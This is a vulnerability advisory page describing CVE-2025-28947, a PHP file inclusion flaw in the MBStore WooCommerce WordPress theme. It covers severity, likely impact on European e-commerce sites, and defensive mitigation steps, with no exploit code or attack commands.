Skip to main content

CVE-2025-28947: CWE-98 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') in snstheme MBStore - Digital WooCommerce WordPress Theme

High
VulnerabilityCVE-2025-28947cvecve-2025-28947cwe-98
Published: Fri Jun 27 2025 (06/27/2025, 11:52:44 UTC)
Source: CVE Database V5
Vendor/Project: snstheme
Product: MBStore - Digital WooCommerce WordPress Theme

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in snstheme MBStore - Digital WooCommerce WordPress Theme allows PHP Local File Inclusion. This issue affects MBStore - Digital WooCommerce WordPress Theme: from n/a through 2.3.

AI-Powered Analysis

AILast updated: 06/27/2025, 12:47:10 UTC

Technical Analysis

CVE-2025-28947 is a high-severity vulnerability classified under CWE-98, which pertains to improper control of filenames used in include or require statements within PHP programs. Specifically, this vulnerability affects the MBStore - Digital WooCommerce WordPress Theme developed by snstheme, up to version 2.3. The flaw allows for PHP Remote File Inclusion (RFI) or Local File Inclusion (LFI), where an attacker can manipulate the filename parameter in the PHP include or require statements to execute arbitrary code or access sensitive files on the server. This occurs because the theme does not properly validate or sanitize user-supplied input used in these statements, enabling an attacker to specify malicious file paths or URLs. Exploitation of this vulnerability can lead to full compromise of the affected web server, including execution of arbitrary PHP code, disclosure of sensitive information, and potential pivoting to other internal systems. The CVSS v3.1 base score is 8.1, indicating a high level of severity with network attack vector, high attack complexity, no privileges required, no user interaction needed, and impacts on confidentiality, integrity, and availability. Although no public exploits are currently known in the wild, the vulnerability’s nature and high score suggest it is a critical risk for websites using this theme, especially those running WooCommerce stores that handle sensitive customer and payment data.

Potential Impact

For European organizations, especially e-commerce businesses using WordPress with the MBStore theme, this vulnerability poses a significant risk. Exploitation could lead to unauthorized access to customer data, including personal and payment information, violating GDPR requirements and potentially resulting in heavy fines and reputational damage. The ability to execute arbitrary code on the server could also allow attackers to deploy malware, deface websites, or disrupt services, impacting business continuity and customer trust. Given the widespread use of WooCommerce in Europe and the popularity of WordPress themes, the attack surface is considerable. Additionally, compromised servers could be used as a foothold for further attacks within corporate networks or for launching supply chain attacks. The high severity and ease of remote exploitation without authentication make this vulnerability particularly dangerous for European organizations that rely on this theme for their online storefronts.

Mitigation Recommendations

Immediate mitigation steps include: 1) Updating the MBStore - Digital WooCommerce WordPress Theme to a patched version once available from the vendor; 2) If a patch is not yet available, temporarily disabling or removing the vulnerable theme to prevent exploitation; 3) Implementing Web Application Firewall (WAF) rules to detect and block suspicious requests attempting to exploit file inclusion vulnerabilities, such as those containing directory traversal sequences or remote URLs in parameters; 4) Conducting thorough input validation and sanitization on all user-supplied inputs in custom code or plugins; 5) Restricting PHP configuration settings such as disabling allow_url_include and allow_url_fopen to prevent remote file inclusion; 6) Regularly auditing web server logs for anomalous access patterns indicative of exploitation attempts; 7) Employing principle of least privilege on web server file permissions to limit the impact of any successful exploit; and 8) Ensuring comprehensive backups and incident response plans are in place to quickly recover from potential compromises.

Need more detailed analysis?Get Pro

Technical Details

Data Version
5.1
Assigner Short Name
Patchstack
Date Reserved
2025-03-11T08:10:12.305Z
Cvss Version
3.1
State
PUBLISHED

Threat ID: 685e88edca1063fb875de491

Added to database: 6/27/2025, 12:05:01 PM

Last enriched: 6/27/2025, 12:47:10 PM

Last updated: 8/15/2025, 4:04:41 AM

Views: 11

Actions

PRO

Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.

Please log in to the Console to use AI analysis features.

Need enhanced features?

Contact root@offseq.com for Pro access with improved analysis and higher rate limits.

Latest Threats